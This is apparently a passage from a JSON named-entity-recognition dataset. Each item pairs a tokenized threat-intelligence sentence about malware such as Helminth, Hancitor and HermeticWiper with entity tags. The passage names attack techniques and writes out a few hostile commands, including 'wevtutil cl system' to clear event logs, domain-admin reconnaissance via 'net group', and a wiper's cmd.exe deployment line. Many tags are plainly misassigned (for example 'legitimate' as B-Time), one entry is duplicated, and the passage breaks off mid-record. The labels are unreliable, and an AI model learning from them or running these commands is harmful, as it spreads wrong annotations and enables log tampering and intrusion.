"HTRAN", - "can", - "proxy", - "TCP", - "socket", - "connections", - "to", - "obfuscate", - "command", - "and", - "control", - "infrastructure." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTRAN", - "can", - "install", - "a", - "rootkit", - "to", - "hide", - "network", - "connections", - "from", - "the", - "host", - "OS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "abuses", - "the", - "Windows", - "DLL", - "load", - "order", - "by", - "using", - "a", - "legitimate", - "Symantec", - "anti-virus", - "binary,", - "VPDN_LU.exe,", - "to", - "load", - "a", - "malicious", - "DLL", - "that", - "mimics", - "a", - "legitimate", - "Symantec", - "DLL,", - "navlu.dll." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "B-SamFile" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "has", - "used", - "DLL", - "side-loading." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "has", - "used", - "DNS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "deletes", - "its", - "original", - "installer", - "file", - "once", - "installation", - "is", - "complete." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "is", - "capable", - "of", - "listing", - "files,", - "folders,", - "and", - "drives", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "is", - "capable", - "of", - "writing", - "a", - "file", - "to", - "the", - "compromised", - "system", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "is", - "capable", - "of", - "capturing", - "keystrokes", - "on", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser's", - "installer", - "contains", - "a", - "malicious", - "file", - "named", - "navlu.dll", - "to", - "decrypt", - "and", - "run", - "the", - "RAT.", - "navlu.dll", - "is", - "also", - "the", - "name", - "of", - "a", - "legitimate", - "Symantec", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "HTTPBrowser's", - "code", - "may", - "be", - "obfuscated", - "through", - "structured", - "exception", - "handling", - "and", - "return-oriented", - "programming." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "has", - "established", - "persistence", - "by", - "setting", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "key", - "value", - "for", - "<code>wdm</code>", - "to", - "the", - "path", - "of", - "the", - "executable.", - "It", - "has", - "also", - "used", - "the", - "Registry", - "entry", - "<code>HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "vpdn", - "“%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe”</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPBrowser", - "is", - "capable", - "of", - "spawning", - "a", - "reverse", - "shell", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HUI", - "Loader", - "can", - "be", - "deployed", - "to", - "targeted", - "systems", - "via", - "legitimate", - "programs", - "that", - "are", - "vulnerable", - "to", - "DLL", - "search", - "order", - "hijacking." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "HUI", - "Loader", - "can", - "decrypt", - "and", - "load", - "files", - "containing", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HUI", - "Loader", - "has", - "the", - "ability", - "to", - "disable", - "Windows", - "Event", - "Tracing", - "for", - "Windows", - "(ETW)", - "and", - "Antimalware", - "Scan", - "Interface", - "(AMSI)", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hacking", - "Team", - "UEFI", - "Rootkit", - "is", - "a", - "UEFI", - "BIOS", - "rootkit", - "developed", - "by", - "the", - "company", - "Hacking", - "Team", - "to", - "persist", - "remote", - "access", - "software", - "on", - "some", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hacking", - "Team", - "UEFI", - "Rootkit", - "is", - "a", - "UEFI", - "BIOS", - "rootkit", - "developed", - "by", - "the", - "company", - "Hacking", - "Team", - "to", - "persist", - "remote", - "access", - "software", - "on", - "some", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "decoded", - "Base64", - "encoded", - "URLs", - "to", - "insert", - "a", - "recipient’s", - "name", - "into", - "the", - "filename", - "of", - "the", - "Word", - "document.", - "Hancitor", - "has", - "also", - "extracted", - "executables", - "from", - "ZIP", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "deleted", - "files", - "using", - "the", - "VBA", - "<code>kill</code>", - "function." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "the", - "ability", - "to", - "download", - "additional", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "malicious", - "Microsoft", - "Word", - "documents,", - "sent", - "via", - "email,", - "which", - "prompted", - "the", - "victim", - "to", - "enable", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "link", - "delivered", - "through", - "phishing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "<code>CallWindowProc</code>", - "and", - "<code>EnumResourceTypesA</code>", - "to", - "interpret", - "and", - "execute", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "Base64", - "to", - "encode", - "malicious", - "links.", - "Hancitor", - "has", - "also", - "delivered", - "compressed", - "payloads", - "in", - "ZIP", - "files", - "to", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "PowerShell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "added", - "Registry", - "Run", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "been", - "delivered", - "via", - "phishing", - "emails", - "with", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "been", - "delivered", - "via", - "phishing", - "emails", - "which", - "contained", - "malicious", - "links." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "verclsid.exe", - "to", - "download", - "and", - "execute", - "a", - "malicious", - "script." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hancitor", - "has", - "used", - "a", - "macro", - "to", - "check", - "that", - "an", - "ActiveDocument", - "shape", - "object", - "in", - "the", - "lure", - "message", - "is", - "present.", - "If", - "this", - "object", - "is", - "not", - "found,", - "the", - "macro", - "will", - "exit", - "without", - "downloading", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Havij", - "is", - "used", - "to", - "automate", - "SQL", - "injection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "A", - "Helminth", - "VBScript", - "receives", - "a", - "batch", - "script", - "to", - "execute", - "a", - "set", - "of", - "commands", - "in", - "a", - "command", - "prompt." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "executable", - "version", - "of", - "Helminth", - "has", - "a", - "module", - "to", - "log", - "clipboard", - "contents." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "samples", - "have", - "been", - "signed", - "with", - "legitimate,", - "compromised", - "code", - "signing", - "certificates", - "owned", - "by", - "software", - "company", - "AI", - "Squared." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Helminth", - "can", - "use", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "splits", - "data", - "into", - "chunks", - "up", - "to", - "23", - "bytes", - "and", - "sends", - "the", - "data", - "in", - "DNS", - "queries", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "has", - "checked", - "for", - "the", - "domain", - "admin", - "group", - "and", - "Exchange", - "Trusted", - "Subsystem", - "groups", - "using", - "the", - "commands", - "<code>net", - "group", - "Exchange", - "Trusted", - "Subsystem", - "/domain</code>", - "and", - "<code>net", - "group", - "domain", - "admins", - "/domain</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Helminth", - "config", - "file", - "is", - "encrypted", - "with", - "RC4." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "can", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "executable", - "version", - "of", - "Helminth", - "has", - "a", - "module", - "to", - "log", - "keystrokes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "creates", - "folders", - "to", - "store", - "output", - "from", - "batch", - "scripts", - "prior", - "to", - "sending", - "the", - "information", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "has", - "checked", - "the", - "local", - "administrators", - "group." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "version", - "of", - "Helminth", - "uses", - "a", - "PowerShell", - "script." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Helminth", - "has", - "used", - "Tasklist", - "to", - "get", - "information", - "on", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "establishes", - "persistence", - "by", - "creating", - "a", - "shortcut", - "in", - "the", - "Start", - "Menu", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "has", - "used", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "establishes", - "persistence", - "by", - "creating", - "a", - "shortcut." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "C2", - "over", - "HTTP,", - "Helminth", - "encodes", - "data", - "with", - "base64", - "and", - "sends", - "it", - "via", - "the", - "\"Cookie\"", - "field", - "of", - "HTTP", - "requests.", - "For", - "C2", - "over", - "DNS,", - "Helminth", - "converts", - "ASCII", - "characters", - "into", - "their", - "hexadecimal", - "values", - "and", - "sends", - "the", - "data", - "in", - "cleartext." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "encrypts", - "data", - "sent", - "to", - "its", - "C2", - "server", - "over", - "HTTP", - "with", - "RC4." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "version", - "of", - "Helminth", - "consists", - "of", - "VBScript", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "can", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Helminth", - "can", - "provide", - "a", - "remote", - "shell.", - "One", - "version", - "of", - "Helminth", - "uses", - "batch", - "scripting." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-Tool" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "use", - "`AdjustTokenPrivileges`", - "to", - "grant", - "itself", - "privileges", - "for", - "debugging", - "with", - "`SeDebugPrivilege`,", - "creating", - "backups", - "with", - "`SeBackupPrivilege`,", - "loading", - "drivers", - "with", - "`SeLoadDriverPrivilege`,", - "and", - "shutting", - "down", - "a", - "local", - "system", - "with", - "`SeShutdownPrivilege`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "overwrite", - "the", - "`C:\\Windows\\System32\\winevt\\Logs`", - "file", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "HermeticWiper", - "executable", - "has", - "been", - "signed", - "with", - "a", - "legitimate", - "certificate", - "issued", - "to", - "Hermetica", - "Digital", - "Ltd." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "recursively", - "wipe", - "folders", - "and", - "files", - "in", - "`Windows`,", - "`Program", - "Files`,", - "`Program", - "Files(x86)`,", - "`PerfLogs`,", - "`Boot,", - "System`,", - "`Volume", - "Information`,", - "and", - "`AppData`", - "folders", - "using", - "`FSCTL_MOVE_FILE`.", - "HermeticWiper", - "can", - "also", - "overwrite", - "symbolic", - "links", - "and", - "big", - "files", - "in", - "`My", - "Documents`", - "and", - "on", - "the", - "Desktop", - "with", - "random", - "bytes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "decompress", - "and", - "copy", - "driver", - "files", - "using", - "`LZCopy`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "corrupt", - "disk", - "partitions", - "and", - "obtain", - "raw", - "disk", - "access", - "to", - "destroy", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "corrupt", - "disk", - "partitions,", - "damage", - "the", - "Master", - "Boot", - "Record", - "(MBR),", - "and", - "overwrite", - "the", - "Master", - "File", - "Table", - "(MFT)", - "of", - "all", - "available", - "physical", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "compress", - "32-bit", - "and", - "64-bit", - "driver", - "files", - "with", - "the", - "Lempel-Ziv", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "overwrite", - "its", - "own", - "file", - "with", - "random", - "bites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "enumerate", - "common", - "folders", - "such", - "as", - "My", - "Documents,", - "Desktop,", - "and", - "AppData." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "deploy", - "through", - "an", - "infected", - "system's", - "default", - "domain", - "policy." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "set", - "the", - "`HKLM:\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl\\CrashDumpEnabled`", - "Registry", - "key", - "to", - "`0`", - "in", - "order", - "to", - "disable", - "crash", - "dumps." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "disable", - "pop-up", - "information", - "about", - "folders", - "and", - "desktop", - "items", - "and", - "delete", - "Registry", - "keys", - "to", - "hide", - "malicious", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "disable", - "the", - "VSS", - "service", - "on", - "a", - "compromised", - "host", - "using", - "the", - "service", - "control", - "manager." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "used", - "the", - "name", - "`postgressql.exe`", - "to", - "mask", - "a", - "malicious", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "modify", - "Registry", - "keys", - "to", - "disable", - "crash", - "dumps,", - "colors", - "for", - "compressed", - "files,", - "and", - "pop-up", - "information", - "about", - "folders", - "and", - "desktop", - "items." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "call", - "multiple", - "Windows", - "API", - "functions", - "used", - "for", - "privilege", - "escalation,", - "service", - "execution,", - "and", - "to", - "overwrite", - "random", - "bites", - "of", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "use", - "scheduled", - "tasks", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "create", - "system", - "services", - "to", - "aid", - "in", - "executing", - "the", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "stop", - "the", - "Volume", - "Shadow", - "Copy", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "determine", - "the", - "OS", - "version,", - "bitness,", - "and", - "enumerate", - "physical", - "drives", - "on", - "a", - "targeted", - "host." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "initiate", - "a", - "system", - "shutdown." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "has", - "the", - "ability", - "to", - "receive", - "a", - "command", - "parameter", - "to", - "sleep", - "prior", - "to", - "carrying", - "out", - "destructive", - "actions", - "on", - "a", - "targeted", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "use", - "`cmd.exe", - "/Q/c", - "move", - "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1", - "CSIDL_WINDOWS\\policydefinitions\\postgresql.exe", - "1>", - "\\\\127.0.0.1\\ADMIN$\\_1636727589.6007507", - "2>&1`", - "to", - "deploy", - "on", - "an", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWiper", - "can", - "load", - "drivers", - "by", - "creating", - "a", - "new", - "service", - "using", - "the", - "`CreateServiceW`", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "the", - "ability", - "to", - "use", - "`wevtutil", - "cl", - "system`", - "to", - "clear", - "event", - "logs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "been", - "signed", - "by", - "valid", - "certificates", - "assigned", - "to", - "Hermetica", - "Digital." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "execute", - "files", - "on", - "remote", - "machines", - "using", - "DCOM." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "the", - "ability", - "to", - "encrypt", - "PE", - "files", - "with", - "a", - "reverse", - "XOR", - "loop." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "can", - "copy", - "files", - "to", - "other", - "machines", - "on", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HermeticWizard", - "has", - "been", - "named", - "`exec_32.dll`", - "to", - 